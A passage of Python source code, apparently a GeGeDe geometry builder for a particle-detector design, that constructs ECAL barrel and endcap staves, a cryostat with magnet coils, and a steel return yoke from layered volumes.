dimensions\n\n # make the mother volume\n name = self.output_name\n\n if self.type == \"Box\":\n layer_shape = geom.shapes.Box(name, dx=(self.dx)/ 2.0, dy=(self.dy)/2.0, dz=(self.depth()) /2.0)\n layer_lv = geom.structure.Volume(name + \"_vol\", shape=layer_shape, material=self.material)\n elif self.type == \"Intersection\":\n layer_shape_full = geom.shapes.PolyhedraRegular(name+\"_full\", numsides=self.nsides, sphi=pi/8, rmin=self.rmin, rmax=self.rmax, dz=(self.depth()))\n layer_quadrant = geom.shapes.Box(name+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=(self.depth()) /2.0)\n layer_quad_pos = geom.structure.Position(name+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n layer_shape = geom.shapes.Boolean(name, type='intersection', first=layer_shape_full, second=layer_quadrant, pos=layer_quad_pos)\n layer_lv = geom.structure.Volume(name +\"_vol\", shape=layer_shape, material=self.material)\n elif self.type == \"IntersectionInside\":\n layer_shape_full = geom.shapes.Tubs(name+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=self.rmin, rmax=self.rmax, dz=(self.depth()))\n layer_quadrant = geom.shapes.Box(name+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=(self.depth()) /2.0)\n layer_quad_pos = geom.structure.Position(name+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n layer_shape = geom.shapes.Boolean(name, type='intersection', first=layer_shape_full, second=layer_quadrant, pos=layer_quad_pos)\n layer_lv = geom.structure.Volume(name +\"_vol\", shape=layer_shape, material=self.material)\n\n # no skipped space before the first layer\n skip = Q(\"0mm\")\n cntr = 1\n zloc = Q(\"0mm\")\n\n for dz, lspace, mat, active in zip(self.dz, self.lspacing, self.mat, self.active):\n sname = (layer_shape.name + \"_slice%i\" % cntr)\n zloc = zloc + skip + dz / 2.0\n\n if self.type == \"Box\":\n slice_shape = geom.shapes.Box(sname, self.dx/2.0, self.dy/2.0, dz / 2.0)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n elif self.type == \"Intersection\":\n slice_shape_full = geom.shapes.PolyhedraRegular(sname+\"_full\", numsides=self.nsides, sphi=pi/8, rmin=self.rmin, rmax=self.rmax, dz=dz)\n slice_quadrant = geom.shapes.Box(sname+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=dz/2.0)\n slice_quad_pos = geom.structure.Position(sname+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n slice_shape = geom.shapes.Boolean(sname, type='intersection', first=slice_shape_full, second=slice_quadrant, pos=slice_quad_pos)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n elif self.type == \"IntersectionInside\":\n slice_shape_full = geom.shapes.Tubs(sname+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=self.rmin, rmax=self.rmax, dz=dz)\n slice_quadrant = geom.shapes.Box(sname+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=dz/2.0)\n slice_quad_pos = geom.structure.Position(sname+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n slice_shape = geom.shapes.Boolean(sname, type='intersection', first=slice_shape_full, second=slice_quadrant, pos=slice_quad_pos)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n\n if active:\n #slice_lv.params.append((\"SensDet\", name))\n slice_lv.params.append((\"SensDet\", self.sensdet_name))\n\n # dzm is the half depth of the mother volume\n # we need to subtract it off to position layers\n # relative to the center of the mother\n slice_pos = geom.structure.Position(sname + \"_pos\", x='0mm', y='0mm', z=zloc - dzm)\n slice_pla = geom.structure.Placement(sname + \"_pla\", volume=slice_lv, pos=slice_pos)\n layer_lv.placements.append(slice_pla.name)\n\n skip = dz / 2.0 + lspace # set the skipped space before the next layer\n cntr += 1\n\n self.add_volume(layer_lv)\n\n\nclass NDHPgTPC_SPYv3_DetElementBuilder(gegede.builder.Builder):\n\n \"\"\"Builds a detector element (ECAL Barrel, ECAL Endcap, Yoke, GArTPC) for the ND HPgTPC SPY v3\"\"\"\n\n defaults = dict(geometry = 'Barrel',\n phi_range = [Q(\"0deg\"), Q(\"360deg\")],\n material = 'Air',\n nsides = 8,\n nModules = 2,\n output_name = 'MPTECalDetElement',\n layer_builder_name = [\"NDHPgTPCHGLayerBuilder\", \"NDHPgTPCLGLayerBuilder\"],\n yokeMaterial = \"Steel\",\n yokeThickness = Q(\"500mm\"),\n yokeThicknessEndcap = Q(\"300mm\"),\n yokePhiCutout = Q(\"90deg\"),\n rInnerTPC = Q(\"2780.2mm\"),\n TPC_halfZ = Q('2600mm'),\n nLayers_Barrel = [8, 72],\n nLayers_Endcap = [6, 54],\n CryostatInnerR = Q(\"3362.5mm\"),\n CryostatOuterR = Q(\"3756mm\"),\n CryostatHalfLength = Q(\"3894mm\"),\n CryostatThickness = Q(\"45mm\"),\n CryostatMaterial = \"Steel\",\n CoilsPos = [Q(\"-1900mm\"), Q(\"-993.55mm\"), Q(\"993.55mm\"), Q(\"1900mm\")],\n CoilWidth = Q(\"1500mm\"),\n CoilInnerR = Q(\"3500mm\"),\n CoilThickness = Q(\"40mm\"),\n CoilMaterial = \"Aluminum\",\n PRYMaterial = \"Iron\",\n buildThinUpstream = False,\n nLayers_Upstream = [8, 0],\n nsides_yoke = 8,\n IntegratedMuID = False,\n MuID_nLayers = 3,\n nModules_yoke = 1,\n buildYokeEndcap = True,\n yoke_stave_to_remove = [7]\n )\n\n #def configure(self, **kwds):\n #super(NDHPgTPCDetElementBuilder, self).configure(**kwds)\n\n # def checkVariables(self):\n # if len(self.nLayers_Barrel) != len(self.layer_builder_name):\n # return False\n # if len(self.nLayers_Endcap) != len(self.layer_builder_name):\n # return False\n # else:\n # return True\n\n def get_ecal_barrel_module_thickness(self, geom):\n\n ecal_barrel_module_thickness = Q(\"0mm\")\n print(\"Ecal Barrel thickness\")\n for nlayer, type in zip(self.nLayers_Barrel, self.layer_builder_name):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n ecal_barrel_module_thickness += nlayer * layer_thickness\n\n return ecal_barrel_module_thickness\n\n def get_ecal_endcap_module_thickness(self, geom):\n\n ecal_endcap_module_thickness = Q(\"0mm\")\n print(\"Ecal Endcap thickness\")\n for nlayer, type in zip(self.nLayers_Endcap, self.layer_builder_name):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n ecal_endcap_module_thickness += nlayer * layer_thickness\n\n return ecal_endcap_module_thickness\n\n def get_pv_endcap_length(self, geom):\n safety = Q(\"0.1mm\")\n length = self.TPC_halfZ + self.get_ecal_endcap_module_thickness(geom) + safety\n\n return length\n\n def get_yoke_barrel_module_thickness(self, geom):\n yoke_barrel_module_thickness = Q(\"0mm\")\n print(\"Yoke barrel thickness\")\n for nlayer, type in zip(self.MuID_nLayers, ['MuIDLayerBuilder']):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n yoke_barrel_module_thickness += nlayer * layer_thickness\n\n return yoke_barrel_module_thickness\n\n def construct(self, geom):\n\n # if self.checkVariables() == False:\n # print \"The variables nLayers and layer_builder_name have different sizes! for builder\", self.name\n # exit()\n\n if self.geometry == 'ECALBarrel':\n self.construct_ecal_barrel_staves(geom)\n elif self.geometry == 'ECALEndcap':\n self.construct_ecal_endcap_staves(geom)\n elif self.geometry == 'Cryostat':\n self.construct_cryostat(geom)\n elif self.geometry == 'Yoke':\n self.construct_yoke(geom)\n else:\n print(\"Could not find the geometry asked!\")\n return\n return\n\n def construct_cryostat(self, geom):\n ''' construct the Cryostat hosting the coils '''\n safety = Q(\"1mm\")\n\n print(\"Construct Cryostat, Inner Radius: \", self.CryostatInnerR, \" Outer Radius: \", self.CryostatOuterR, \" Thickness \", self.CryostatThickness, \" Length \", self.CryostatHalfLength*2)\n\n ''' Fake shape filled with Air to contain the coils '''\n cryostat_name = self.output_name\n cryostat_shape = geom.shapes.Tubs(cryostat_name, rmin=self.CryostatInnerR, rmax=self.CryostatOuterR, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_vol = geom.structure.Volume(\"vol\"+cryostat_name, shape=cryostat_shape, material=\"Air\")\n\n for ncoil, coilp in zip(range(len(self.CoilsPos)), self.CoilsPos):\n coil_name = self.output_name + \"_Coil%01i\" % ncoil\n coil_shape = geom.shapes.Tubs(coil_name, rmin=self.CoilInnerR, rmax=self.CoilInnerR+self.CoilThickness, dz=self.CoilWidth/2., sphi=\"0deg\", dphi=\"360deg\")\n coil_vol = geom.structure.Volume(\"vol\"+coil_name, shape=coil_shape, material=self.CoilMaterial)\n\n '''Place the coils in the magnet volume'''\n #Placement layer in stave\n coil_pos = geom.structure.Position(coil_name+\"_pos\", z=coilp)\n coil_pla = geom.structure.Placement(coil_name+\"_pla\", volume=coil_vol, pos=coil_pos)\n cryostat_vol.placements.append(coil_pla.name)\n\n ''' Placing the walls of the cryostat '''\n\n ''' Barrel '''\n cryostat_name_inner_barrel = self.output_name+\"InnerBarrelWall\"\n cryostat_shape_inner_barrel = geom.shapes.Tubs(cryostat_name_inner_barrel, rmin=self.CryostatInnerR, rmax=self.CryostatInnerR+self.CryostatThickness, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_inner_barrel_vol = geom.structure.Volume(\"vol\"+cryostat_name_inner_barrel, shape=cryostat_shape_inner_barrel, material=self.CryostatMaterial)\n coil_inner_barrel_pos = geom.structure.Position(cryostat_name_inner_barrel+\"_pos\", z=Q(\"0mm\"))\n coil_inner_barrel_pla = geom.structure.Placement(cryostat_name_inner_barrel+\"_pla\", volume=cryostat_inner_barrel_vol, pos=coil_inner_barrel_pos)\n cryostat_vol.placements.append(coil_inner_barrel_pla.name)\n\n cryostat_name_outer_barrel = self.output_name+\"OuterBarrelWall\"\n cryostat_shape_outer_barrel = geom.shapes.Tubs(cryostat_name_outer_barrel, rmin=self.CryostatOuterR-self.CryostatThickness, rmax=self.CryostatOuterR, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_outer_barrel_vol = geom.structure.Volume(\"vol\"+cryostat_name_outer_barrel, shape=cryostat_shape_outer_barrel, material=self.CryostatMaterial)\n coil_outer_barrel_pos = geom.structure.Position(cryostat_name_outer_barrel+\"_pos\", z=Q(\"0mm\"))\n coil_outer_barrel_pla = geom.structure.Placement(cryostat_name_outer_barrel+\"_pla\", volume=cryostat_outer_barrel_vol, pos=coil_outer_barrel_pos)\n cryostat_vol.placements.append(coil_outer_barrel_pla.name)\n \n self.add_volume(cryostat_vol)\n\n '''Endcaps'''\n #Mother volume Endcap\n CryostatEndcap_min_z = self.CryostatHalfLength\n CryostatEndcap_max_z = self.CryostatHalfLength + self.CryostatThickness\n cryostat_endcap_shape_min = geom.shapes.Tubs(\"CryostatEndcap_min\", rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=CryostatEndcap_min_z, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_endcap_shape_max = geom.shapes.Tubs(\"CryostatEndcap_max\", rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=CryostatEndcap_max_z, sphi=\"0deg\", dphi=\"360deg\")\n\n ecryostat_name = \"CryostatEndcap\"\n cryostat_endcap_shape = geom.shapes.Boolean( ecryostat_name, type='subtraction', first=cryostat_endcap_shape_max, second=cryostat_endcap_shape_min )\n cryostat_endcap_vol = geom.structure.Volume( \"vol\"+ecryostat_name, shape=cryostat_endcap_shape, material=\"Air\")\n\n for side in [\"L\", \"R\"]:\n #Create the volume for the endcaps\n ecryostat_name = ecryostat_name + side\n ecryostat_volname = \"vol\"+ ecryostat_name\n cryostat_endcap_shape_one = geom.shapes.Tubs(ecryostat_name, rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=self.CryostatThickness/2., sphi=\"0deg\", dphi=\"360deg\")\n cryostat_endcap_lv = geom.structure.Volume( ecryostat_volname, shape=cryostat_endcap_shape_one, material=self.CryostatMaterial)\n z_pos = CryostatEndcap_max_z - self.CryostatThickness/2.\n if side == 'R':\n z_pos = -z_pos\n pos = geom.structure.Position(ecryostat_name + side + \"_pos\", z=z_pos)\n rot = geom.structure.Rotation(ecryostat_name + side + \"_rot\", z=Q(\"0deg\"))\n pla = geom.structure.Placement(ecryostat_name + side + \"_pla\", volume=cryostat_endcap_lv, pos=pos, rot=rot)\n cryostat_endcap_vol.placements.append(pla.name)\n\n self.add_volume(cryostat_endcap_vol)\n\n \n def construct_ecal_barrel_staves(self, geom):\n ''' construct a set of ECAL staves for the Barrel '''\n\n # ECAL stave\n # /----------------\\ //Small side\n # / \\\n # /____________________\\ //Large side\n #\n # z\n # ^\n # |\n # |-----> x\n #\n # need to create the layer based on the position in depth z -> different layer sizes\n\n print(\"Construct ECAL Barrel\")\n\n # ECAL Barrel\n safety = Q(\"0.1mm\")\n nsides = self.nsides\n dphi = (2*pi/nsides)\n hphi = dphi/2;\n\n #ecal module thickness\n ecal_barrel_module_thickness = self.get_ecal_barrel_module_thickness(geom)\n ecal_barrel_module_thickness_noSupport = ecal_barrel_module_thickness - safety\n #inner radius ecal (TPC + pv + safety)\n rInnerEcal = self.rInnerTPC\n print(\"Ecal inner radius \", rInnerEcal)\n #barrel length (TPC + PV)\n Barrel_halfZ = self.get_pv_endcap_length(geom)\n \n #outer radius ecal (inner radius ecal + ecal module)\n rOuterEcal = rInnerEcal + ecal_barrel_module_thickness\n print(\"Ecal outer radius \", rOuterEcal)\n #check that the ECAL thickness does not go over the magnet radius\n ecal_barrel_module_thickness_max = self.CryostatInnerR * cos(pi/nsides) - rInnerEcal\n\n print(\"Barrel Module thickness \", ecal_barrel_module_thickness)\n print(\"Maximum allowed thickness \", ecal_barrel_module_thickness_max)\n\n if ecal_barrel_module_thickness > ecal_barrel_module_thickness_max:\n print(\"Will have overlaps if the magnet is present!\")\n\n #minimum dimension of the stave\n min_dim_stave = 2 * tan( pi/nsides ) * rInnerEcal\n #maximum dimension of the stave\n max_dim_stave = 2 * tan( pi/nsides ) * rOuterEcal\n\n Ecal_Barrel_halfZ = Barrel_halfZ\n Ecal_Barrel_n_modules = self.nModules\n #dimension of a module along the ND x direction\n Ecal_Barrel_module_dim = Ecal_Barrel_halfZ * 2 / Ecal_Barrel_n_modules\n\n print(\"Large side of the stave\", max_dim_stave)\n print(\"Small side of the stave\", min_dim_stave)\n print(\"Barrel module dim in z\", Ecal_Barrel_module_dim)\n print(\"Build Thinner Upstream ECAL\", self.buildThinUpstream)\n if self.buildThinUpstream:\n print(\"Number of layers for the Upstream ECAL\", self.nLayers_Upstream)\n\n #Position of the stave in the Barrel (local coordinates)\n X = rInnerEcal + safety + ecal_barrel_module_thickness / 2.\n #Y = (ecal_barrel_module_thickness_noSupport / 2.) / sin(2.*pi/nsides)\n Y = Q('0mm')\n\n #print \"X \", X, \" and Y \", Y\n #Mother volume Barrel\n barrel_shape = geom.shapes.PolyhedraRegular(self.output_name, numsides=nsides, rmin=rInnerEcal, rmax=rOuterEcal+2*safety, dz=Ecal_Barrel_halfZ+safety)\n barrel_lv = geom.structure.Volume(\"vol\"+self.output_name, shape=barrel_shape, material=self.material)\n\n sensname = self.output_name + \"_vol\"\n for istave in range(nsides):\n stave_id = istave+1\n dstave = int( nsides/4.0 )\n phirot = hphi + pi/2.0\n phirot += (istave - dstave)*dphi\n phirot2 = (istave - dstave) * dphi + hphi\n\n placing_angle = phirot2*180/pi+292.5\n if placing_angle >= 360:\n placing_angle = placing_angle - 360\n\n print(\"Placing stave \", stave_id, \" at angle \", placing_angle, \" deg\")\n\n for imodule in range(Ecal_Barrel_n_modules):\n module_id = imodule+1\n print(\"Placing stave \", stave_id, \" and module \", module_id)\n\n stave_name = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n stave_shape = geom.shapes.Trapezoid(stave_name, dx1=min_dim_stave/2.0, dx2=max_dim_stave/2.0,\n dy1=(Ecal_Barrel_module_dim-safety)/2.0, dy2=(Ecal_Barrel_module_dim-safety)/2.0,\n dz=ecal_barrel_module_thickness/2.0)\n\n stave_lv = geom.structure.Volume(stave_volname, shape=stave_shape, material=self.material)\n\n zPos = Q(\"0mm\")\n layer_id = 1\n\n # check if angle is below -90/90 deg for full modules, otherwise thinner upstream ECAL\n if placing_angle < 315 and placing_angle > 45:\n for nlayer, type in zip(self.nLayers_Barrel, self.layer_builder_name):\n for ilayer in range(nlayer):\n\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n #Configure the layer length based on the zPos in the stave\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/nsides )\n l_dim_y = Ecal_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_barrel_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n else:\n nLoopLayers = self.nLayers_Barrel\n if self.buildThinUpstream:\n nLoopLayers = self.nLayers_Upstream\n\n for nlayer, type in zip(nLoopLayers, self.layer_builder_name):\n for ilayer in range(nlayer):\n\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n #Configure the layer length based on the zPos in the stave\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/nsides )\n l_dim_y = Ecal_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_barrel_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Barrel\n name = stave_lv.name\n\n #print \"Placing stave at x= \", (X*cos(phirot2)-Y*sin(phirot2))\n #print \"Placing stave at y= \", (X*sin(phirot2)+Y*cos(phirot2))\n\n pos = geom.structure.Position(name + \"_pos\", x=(X*cos(phirot2)-Y*sin(phirot2)), y=(X*sin(phirot2)+Y*cos(phirot2)), z=( imodule+0.5 )*Ecal_Barrel_module_dim - Barrel_halfZ )\n rot = geom.structure.Rotation(name + \"_rot\", x=pi/2.0, y=phirot+pi, z=Q(\"0deg\"))\n pla = geom.structure.Placement(name + \"_pla\", volume=stave_lv, pos=pos, rot=rot)\n\n barrel_lv.placements.append(pla.name)\n\n self.add_volume(barrel_lv)\n\n def construct_ecal_endcap_staves(self, geom):\n ''' construct a set of ECAL staves for the Endcap '''\n\n #ECAL Endcap inside the PV\n safety = Q(\"0.1mm\")\n ecal_endcap_module_thickness = self.get_ecal_endcap_module_thickness(geom)\n rInnerEcal = self.rInnerTPC - safety\n Barrel_halfZ = self.TPC_halfZ + safety\n\n EcalEndcap_inner_radius = Q(\"0mm\")\n EcalEndcap_outer_radius = rInnerEcal\n Ecal_Barrel_halfZ = Barrel_halfZ\n EcalEndcap_min_z = Ecal_Barrel_halfZ\n EcalEndcap_max_z = Ecal_Barrel_halfZ + ecal_endcap_module_thickness\n Ecal_Barrel_n_modules = self.nModules\n\n rmin = EcalEndcap_inner_radius\n rmax = EcalEndcap_outer_radius\n\n print(\"Quadrant side \", rmax)\n print(\"Endcap thickness \", ecal_endcap_module_thickness)\n\n #Mother volume Endcap\n endcap_shape_min = geom.shapes.Tubs(\"ECALEndcap_min\", rmin=rmin, rmax=rmax, dz=EcalEndcap_min_z, sphi=\"0deg\", dphi=\"360deg\")\n endcap_shape_max = geom.shapes.Tubs(\"ECALEndcap_max\", rmin=rmin, rmax=rmax, dz=EcalEndcap_max_z, sphi=\"0deg\", dphi=\"360deg\")\n\n endcap_shape = geom.shapes.Boolean( self.output_name, type='subtraction', first=endcap_shape_max, second=endcap_shape_min )\n endcap_lv = geom.structure.Volume( \"vol\"+self.output_name, shape=endcap_shape, material=self.material )\n\n # Place staves in the Endcap Volume\n sensname = self.output_name + \"_vol\"\n module_id = -1\n for iend in range(2):\n if iend == 0:\n module_id = 0\n else:\n module_id = Ecal_Barrel_n_modules + 1\n\n this_module_z_offset = (EcalEndcap_min_z + EcalEndcap_max_z)/2.\n if iend == 0:\n this_module_z_offset *= -1\n\n this_module_rotY = 0.;\n if iend == 0:\n this_module_rotY = pi;\n # this_module_rotY = pi;\n\n rotZ_offset = (pi/8. + 3.*pi/4.)\n if iend == 0:\n rotZ_offset = (pi/8. - pi/2.)\n # rotZ_offset = (pi/8. - pi/2.)\n\n for iquad in range(4):\n stave_id = iquad+1\n this_module_rotZ = 0\n if iend == 0:\n this_module_rotZ = rotZ_offset - (iquad-2) * pi/2.\n else:\n this_module_rotZ = rotZ_offset + (iquad+1) * pi/2.\n\n print(\"Placing stave \", stave_id, \" and module \", module_id)\n\n #Create a template module\n stave_name = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n endcap_stave_full = geom.shapes.Tubs(stave_name+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=rmin, rmax=rmax, dz=ecal_endcap_module_thickness)\n quadr = rmax\n quadrant = geom.shapes.Box(stave_name+\"_quadrant\", dx=quadr, dy=quadr, dz=ecal_endcap_module_thickness/2)\n\n endcap_stave_pos = geom.structure.Position(stave_name+\"_pos\", x=quadr, y=quadr, z=Q(\"0mm\"))\n endcap_stave_shape = geom.shapes.Boolean(stave_name, type='intersection', first=endcap_stave_full, second=quadrant, pos=endcap_stave_pos)\n endcap_stave_lv = geom.structure.Volume(stave_volname, shape=endcap_stave_shape, material=self.material)\n\n zPos = Q(\"0mm\")\n layer_id = 1\n\n for nlayer, type in zip(self.nLayers_Endcap, self.layer_builder_name):\n for ilayer in range(nlayer):\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n NDHPgTPCLayerBuilder.EndcapConfigurationLayer(Layer_builder, 0, rmin, rmax, quadr, layername, sensname, \"IntersectionInside\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n # Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_endcap_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n endcap_stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Endcap\n name = endcap_stave_lv.name\n endcap_stave_pos = geom.structure.Position(name + \"_pos\", z=this_module_z_offset )\n endcap_stave_rot = geom.structure.Rotation(name + \"_rot\", x=Q(\"0deg\"), y=this_module_rotY, z=this_module_rotZ+pi/4)\n endcap_stave_pla = geom.structure.Placement(name + \"_pla\", volume=endcap_stave_lv, pos=endcap_stave_pos, rot=endcap_stave_rot)\n endcap_lv.placements.append(endcap_stave_pla.name)\n\n self.add_volume(endcap_lv)\n\n def construct_yoke(self, geom):\n '''Construct the Yoke'''\n\n safety = Q(\"1mm\")\n space = Q(\"1cm\")\n yoke_barrel_thickness = self.get_yoke_barrel_module_thickness(geom)\n rmin_barrel = self.CryostatOuterR + space\n # rmax_endcap = self.rInnerTPC + Q(\"1400mm\")\n rmax_endcap = rmin_barrel + yoke_barrel_thickness + safety\n ecal_endcap_module_thickness = self.get_ecal_endcap_module_thickness(geom)\n # YokeEndcap_min_z = self.get_pv_endcap_length(geom) + ecal_endcap_module_thickness + safety\n YokeEndcap_min_z = self.CryostatHalfLength + self.CryostatThickness + safety\n YokeEndcap_max_z = YokeEndcap_min_z + self.yokeThicknessEndcap + safety\n\n print(\"Construct PRY made of \", self.PRYMaterial, \" with a radius of \", rmin_barrel, \" a thickness of \", yoke_barrel_thickness, \" and a length of \", YokeEndcap_min_z*2)\n print(\"Build integrated Muon ID \", self.IntegratedMuID)\n\n '''Barrel'''\n byoke_name = \"YokeBarrel\"\n yoke_barrel_shape = geom.shapes.PolyhedraRegular(byoke_name, numsides=self.nsides_yoke, rmin=rmin_barrel, rmax=rmax_endcap, dz=YokeEndcap_min_z)\n yoke_barrel_vol = geom.structure.Volume(\"vol\"+byoke_name, shape=yoke_barrel_shape, material=\"Air\")\n\n #minimum dimension of the stave\n min_dim_stave = 2 * tan( pi/self.nsides_yoke ) * rmin_barrel\n #maximum dimension of the stave\n max_dim_stave = 2 * tan( pi/self.nsides_yoke ) * rmax_endcap\n Yoke_Barrel_n_modules = self.nModules_yoke\n Yoke_Barrel_module_dim = YokeEndcap_min_z * 2 / Yoke_Barrel_n_modules\n\n #Position of the stave in the Barrel (local coordinates)\n dphi = (2*pi/self.nsides_yoke)\n hphi = dphi/2;\n minus_deg = 0\n if self.nsides_yoke == 16:\n minus_deg = 11.25\n sensname = \"MuID\" + \"_vol\"\n\n ''' Normal stave '''\n for istave in range(self.nsides_yoke):\n\n X = rmin_barrel + yoke_barrel_thickness / 2.\n Y = Q('0mm')\n stave_id = istave+1\n dstave = int( self.nsides_yoke/4.0 )\n phirot = hphi + pi/2.0\n phirot += (istave - dstave)*dphi\n phirot2 = (istave - dstave) * dphi + hphi\n\n placing_angle = phirot2*180/pi+292.5 + minus_deg\n if placing_angle >= 360:\n placing_angle = placing_angle - 360\n\n xpos = X*cos(phirot2)-Y*sin(phirot2)\n ypos = X*sin(phirot2)+Y*cos(phirot2)\n\n #remove the stave(s) in front of the LAr\n #nsides = 8 -> stave 8\n #nsides = 16 -> stave 4,5,6\n set_stave = set(self.yoke_stave_to_remove)\n if stave_id in set_stave:\n print(\"Ignoring stave\", stave_id)\n continue\n\n # if stave_id > 2: continue\n\n print(\"Placing stave \", stave_id, \" at angle \", placing_angle, \" deg\")\n\n for imodule in range(Yoke_Barrel_n_modules):\n module_id = imodule+1\n print(\"Placing stave \", stave_id, \" and module \", module_id)\n\n stave_name = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n stave_shape = geom.shapes.Trapezoid(stave_name, dx1=min_dim_stave/2.0, dx2=max_dim_stave/2.0,\n dy1=(Yoke_Barrel_module_dim-safety)/2.0, dy2=(Yoke_Barrel_module_dim-safety)/2.0,\n dz=yoke_barrel_thickness/2.0)\n stave_lv = geom.structure.Volume(stave_volname, shape=stave_shape, material=self.PRYMaterial)\n\n if self.IntegratedMuID == True:\n zPos = Q(\"0mm\")\n layer_id = 1\n\n for nlayer, type in zip(self.MuID_nLayers, ['MuIDLayerBuilder']):\n for ilayer in range(nlayer):\n\n layername = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n print(\"Adding \", layername)\n\n #Configure the layer length based on the zPos in the stave\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/self.nsides_yoke )\n l_dim_y = Yoke_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - yoke_barrel_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Barrel\n name = stave_lv.name\n pos = geom.structure.Position(name + \"_pos\", x=xpos, y=ypos, z=( imodule+0.5 )*Yoke_Barrel_module_dim - 